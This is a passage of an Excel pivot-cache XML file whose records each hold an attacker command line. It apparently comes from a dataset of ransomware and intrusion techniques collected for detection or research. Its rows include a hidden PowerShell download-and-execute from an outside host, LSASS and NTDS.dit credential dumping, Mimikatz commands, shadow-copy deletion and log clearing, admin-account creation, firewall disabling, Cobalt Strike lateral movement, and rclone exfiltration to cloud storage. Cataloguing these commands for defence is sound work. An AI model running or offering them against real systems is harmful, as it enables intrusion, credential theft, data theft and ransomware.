    <s v="cmd /c powershell.exe -nop -w hidden -c &quot;IEX ((new-object net.webclient).downloadstring('http://regsvcast.com:80/aecewcfwefwe/&quot;))&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0186"/>
    <m/>
    <m/>
    <s v="$s=New-Object IO.MemoryStream(,[convert]::FromBase64String('encoded'); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress)))ReadToEnd();"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0187"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\schtasks.exe /create /ru system /sc minute /tn microsoft\windows\wininet\cachetask /tr c:\:cachetask -b &lt;bind port&gt; /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0188"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\schtasks.exe /run /tn microsoft\windows\wininet\cachetask"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0189"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\reg.exe add hklm\software\microsoft\windows nt\currentversion\image file execution options\taskmgr.exe /v debugger /t reg_sz /d c:\system"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0190"/>
    <m/>
    <m/>
    <s v="cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\windows\temp\system.exe -l socks5://127.0.0.1:3388 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr c:\windows\temp\system.exe -l rtcp://0.0.0.0:1116/127.0.0.1:3388 -f mwss://52[.]149[.]228[.]45:443 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\windows\temp\system.exe -l socks5://127.0.0.1:3388 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr c:\windows\temp\system.exe -l rtcp://0.0.0.0:1117/127.0.0.1:3388 -f mwss://20[.]46[.]245[.]56:443 /st 12:00 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0191"/>
    <m/>
    <m/>
    <s v="powershell rundll32.exe c:\windows\system32\comsvcs.dll, minidump (get-process lsass).id c:\temp\lsass.dmp full"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0192"/>
    <m/>
    <m/>
    <s v="cmd.exe /q /c steal.exe 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1 cmd.exe /q /c cd results 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1 cmd.exe /q /c dir 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1  cmd.exe /q /c del archive.zip 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1 cmd.exe /q /c del c:\steal.exe 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0193"/>
    <m/>
    <m/>
    <s v="c:\windows\system\procdump.exe -accepteula -ma lsass.exe lsass.dmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0194"/>
    <m/>
    <m/>
    <s v="cmd.exe /c c:\programdata\system\svchost.exe /hide /auto:c:\programdata\system\192.xml /range:192.168.0.0-192.168.255.255 c:\programdata\system\svchost.exe /hide /auto:c:\programdata\system\192.xml /range:192.168.0.0-192.168.255.255 cmd.exe /c c:\programdata\system\svchost.exe /hide /auto:c:\programdata\system\192.xml /range:192.168.0.0-192.168.255.255"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0195"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\windowspowershell\v1.0\powershell.exe -exec bypass .\adrecon.ps1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0196"/>
    <m/>
    <m/>
    <s v="cmd.exe /q /c teamviewer.exe --getid cmd.exe /q /c dir c:&quot;program files cmd.exe /q /c dir c:&quot;program files (x86) 1 cmd.exe /q /c dir c:&quot;program files (x86)\teamviewer\ cmd.exe /q /c c:&quot;program files (x86)\teamviewer\teamviewer.exe --getid"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0197"/>
    <m/>
    <m/>
    <s v="cmd.exe /q /c c:&quot;program files (x86)\teamviewer\teamviewer.exe -info"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0198"/>
    <m/>
    <m/>
    <s v="cmd.exe /q /c dir c:&quot;program files (x86)\_x000a_cmd.exe /q /c dir c:&quot;program files (x86)&quot;keepass password safe 2\_x000a_cmd.exe /q /c type c:&quot;program files (x86)&quot;keepass password safe 2\keepass.exe.config"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0199"/>
    <m/>
    <m/>
    <s v="1&gt; \\127.0.0.1\admin$\__&lt;timestamp&gt;.&lt;6 digits&gt; 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0200"/>
    <m/>
    <m/>
    <s v="cmd.exe /q /c netsh advfirewall firewall add rule name=service dir=in protocol=tcp localport=5985 action=permit 1&gt; \\127.0.0.1\c$\windows\temp\qaiumg 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0201"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\wevtutil.exe set-log active directory web services /enabled:false"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0202"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\wevtutil.exe set-log application /enabled:false"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0203"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\wevtutil.exe set-log hardwareevents /enabled:false"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0204"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\wevtutil.exe set-log internet explorer /enabled:false"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0205"/>
    <m/>
    <m/>
    <s v="cmd.exe /q /c reg add hkey_local_machine\system\currentcontrolset\control\lsa /v disablerestrictedadmin /t reg_dword /d 0 1&gt; \\127.0.0.1\admin\$\__&lt;timestamp&gt;\.&lt;num&gt; 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0206"/>
    <m/>
    <m/>
    <s v="cmd.exe /q /c #upload c:\users\&lt;user&gt;\documents\&lt;doc&gt; /home/kali/desktop/&lt;doc&gt; 1&gt; \\127.0.0.1\admin$\&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0207"/>
    <m/>
    <m/>
    <s v="cmd.exe /q /c #download c:\users\&lt;user&gt;\documents\&lt;doc&gt; /home/kali/desktop/&lt;doc&gt; 1&gt; \\127.0.0.1\admin$\&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0208"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\windowspowershell\v1.0\powershell.exe -exec bypass .\apply.ps1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0209"/>
    <m/>
    <m/>
    <s v="cmd.exe /q /c gpupdate /force"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0210"/>
    <m/>
    <m/>
    <s v="cmd.exe /c \\&lt;domaincontroller&gt;\netlogon\defender.vbs"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0211"/>
    <m/>
    <m/>
    <s v="cmd.exe /c \\&lt;domaincontroller&gt;\netlogon\def.vbs"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0212"/>
    <m/>
    <m/>
    <s v="cmd.exe -c \\&lt;domain controller&gt;\netlogon\&lt;num&gt;.exe --access-token &lt;token&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0213"/>
    <m/>
    <m/>
    <s v="cmd.exe -c \\&lt;domain controller&gt;\netlogon\&lt;num&gt;.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0214"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\cmd.exe /c fsutil behavior set symlinkevaluation r2l:1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0215"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\cmd.exe /c reg add hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters /v maxmpxct /d 65535 /t reg_dword /f c:\windows\system32\cmd.exe /c fsutil behavior set symlinkevaluation r2r:1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0216"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\cmd.exe /c vssadmin.exe delete shadows /all /quiet c:\windows\system32\cmd.exe /c wmic.exe shadowcopy delete c:\windows\system32\cmd.exe /c arp -a c:\windows\system32\cmd.exe /c bcdedit /set {default}"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0217"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\cmd.exe /c cmd.exe /c for /f &quot;tokens=*&quot; %1 in ('wevtutil.exe el') do wevtutil.exe cl &quot;%1&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0218"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="procc-eid0219"/>
    <m/>
    <m/>
    <s v="vssadmin.exe Delete Shadows /all /quiet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="procc-eid0220"/>
    <m/>
    <m/>
    <s v="wmic.exe Shadowcopy Delete"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="procc-eid0221"/>
    <m/>
    <m/>
    <s v="wmic csproduct get UUID"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="procc-eid0222"/>
    <m/>
    <m/>
    <s v="reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services \LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="procc-eid0223"/>
    <m/>
    <m/>
    <s v="for /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="procc-eid0224"/>
    <m/>
    <m/>
    <s v="fsutil behavior set SymlinkEvaluation R2L:1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="procc-eid0225"/>
    <m/>
    <m/>
    <s v="fsutil behavior set SymlinkEvaluation R2R:1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="procc-eid0226"/>
    <m/>
    <m/>
    <s v="net use \\[computer name]  /user:[domain]\[user] [password] /persistent:no"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="procc-eid0227"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe” /c “bcdedit /set {default}”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="procc-eid0228"/>
    <m/>
    <m/>
    <s v="“C:\Windows\system32\cmd.exe” /c “bcdedit /set {default} recoveryenabled No”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="procc-eid0229"/>
    <m/>
    <m/>
    <s v="“C:\Windows\system32\cmd.exe” /c “vssadmin.exe Delete Shadows /all /quiet”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="procc-eid0230"/>
    <m/>
    <m/>
    <s v="“C:\Windows\system32\cmd.exe” /c “wmic.exe Shadowcopy Delete”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="procc-eid0231"/>
    <m/>
    <m/>
    <s v="“C:\Windows\system32\cmd.exe” /c “cmd.exe /c  for /F \”tokens=*\” Incorrect function. in (‘ wevtutil.exe el ‘) DO wevtutil.exe cl \”Incorrect function. \””"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="procc-eid0232"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell SCHTASKS /s ip\hostname /RU &quot;SYSTEM&quot; /create /tn &quot;WindowsSensor15&quot; /tr &quot;cmd.exe /c C:\ProgramData\P32.exe&quot; /sc ONCE /sd 01/01/1970 /st 00:00"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0233"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell SCHTASKS /s ip\hostname /run /TN &quot;WindowsSensor15&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0234"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell schtasks /S ip\hostname /TN &quot;WindowsSensor15&quot; /DELETE /F"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0235"/>
    <m/>
    <m/>
    <s v="net user Admin Password1 /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0236"/>
    <m/>
    <m/>
    <s v="net localgroup Administrators Admin /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0237"/>
    <m/>
    <m/>
    <s v="net user oldadministrator &quot;qc69t4B#Z0kE3&quot; /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0238"/>
    <m/>
    <m/>
    <s v="net localgroup Administrators oldadministrator /ADD"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0239"/>
    <m/>
    <m/>
    <s v="delete DsMpEng.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0240"/>
    <m/>
    <m/>
    <s v="Set-ItemProperty -Path &quot;HKLM:\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp&quot; -Name PortNumber -Value 1350"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0241"/>
    <m/>
    <m/>
    <s v="NetSh Advfirewall set allprofiles state off"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0242"/>
    <m/>
    <m/>
    <s v="netsh advfirewall firewall set rule group=&quot;remote desktop&quot; new enable=Yes"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0243"/>
    <m/>
    <m/>
    <s v="netsh firewall set service type =remotedesktop mode=enable"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0244"/>
    <m/>
    <m/>
    <s v="New-NetFirewallRule -DisplayName &quot;New RDP Port 1350&quot; -Direction Inbound -LocalPort 1350 -Protocol TCP -Action allow"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0245"/>
    <m/>
    <m/>
    <s v="New-NetFirewallRule -DisplayName &quot;New RDP Port 1350&quot; -Direction Inbound -LocalPort 1350 -Protocol UDP -Action allow"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0246"/>
    <m/>
    <m/>
    <s v="wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot; process call create &quot;cmd /c vssadmin create shadow /for=C: 2&gt;&amp;1&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0247"/>
    <m/>
    <m/>
    <s v="wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot; process call create&quot;cmd /c copy \?_x000a_\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ &amp; copy \?_x000a_\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ &amp;copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0248"/>
    <m/>
    <m/>
    <s v="Esentutl /p C:\log\ntds.dit"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0249"/>
    <m/>
    <m/>
    <s v="wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot; process call create &quot;cmd /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ &amp; copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c\temp\log\ &amp; copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0250"/>
    <m/>
    <m/>
    <s v="rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0251"/>
    <m/>
    <m/>
    <s v="wmic /node:[target] process call create &quot;cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0252"/>
    <m/>
    <m/>
    <s v="remote-exec psexec [target] cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full (Cobalt Strike command)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0253"/>
    <m/>
    <m/>
    <s v="privilege::debug"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0254"/>
    <m/>
    <m/>
    <s v="sekurlsa::minidump A:\3.WORK\BL-ws20\lsass.DMP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0255"/>
    <m/>
    <m/>
    <s v="sekurlsa::logonpasswords"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0256"/>
    <m/>
    <m/>
    <s v="powershell-import /tmp/Fast-Guide/Invoke-SMBAutoBrute.ps1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0257"/>
    <m/>
    <m/>
    <s v="psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList &quot;Password1, Welcome1, 1qazXDR% +&quot; -LockoutThreshold 5"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0258"/>
    <m/>
    <m/>
    <s v="netscan.exe /hide /auto:&quot;result.xml&quot; /config:netscan.xml /range:192.168.0.1-192.168.1.255"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0259"/>
    <m/>
    <m/>
    <s v="wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot; process call create &quot;cmd /c vssadmin list shadows &gt;&gt; c:\log.txt&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0260"/>
    <m/>
    <m/>
    <s v="powershell Get-DomainController"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0261"/>
    <m/>
    <m/>
    <s v="powershell Get-DomainComputer -OperatingSystem *server* -Properties dnshostname"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0262"/>
    <m/>
    <m/>
    <s v="powershell get-adcomputer -filter * | select -expand name"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0263"/>
    <m/>
    <m/>
    <s v="nltest /dclist:&quot;NameDomain&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0264"/>
    <m/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0265"/>
    <m/>
    <m/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0266"/>
    <m/>
    <m/>
    <s v="net group &quot;Enterprise Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0267"/>
    <m/>
    <m/>
    <s v="powershell Get-NetSubnet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0268"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0269"/>
    <m/>
    <m/>
    <s v="7za.exe a -tzip -mx5 \DC01\C$\temp\log.zip\DC01\C$\temp\log -pTOPSECRETPASSWORD"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0270"/>
    <m/>
    <m/>
    <s v="rclone.exe copy &quot;\envisionpharma.com\IT\KLSHARE&quot; Mega:Finanse -q --ignore-existing  --auto-confirm --multi-thread-streams 12 --transfers 12"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0271"/>
    <m/>
    <m/>
    <s v="rclone.exe copy &quot;\PETERLENOVO.wist.local\Users&quot; ftp1:uploads/Users/ -q --ignore-existing  --auto-confirm --multi-thread-streams 3 --transfers 3"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0272"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot;process call create &quot;cmd /c vssadmin list shadows &gt;&gt; c:\log.txt&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0273"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell wmic /node:10.28.0.3 process call create &quot;C:\ProgramData\j1.exe&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0274"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell wmic /node:172.16.0.36 process call create &quot;rundll32.exe C:\ProgramData\p64.dll StartW&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0275"/>
    <m/>
    <m/>
    <s v="remote-exec wmi FMH-DC01 rundll32.exe C:\ProgramData\tlt.dll StartW"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0276"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell wmic /node:&quot;PC NAME&quot; process call create &quot;COMMAND TO BE EXECUTED&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0277"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot; &gt; ad_users.txt"/>
    <m/>
    <m/>
    <m/>
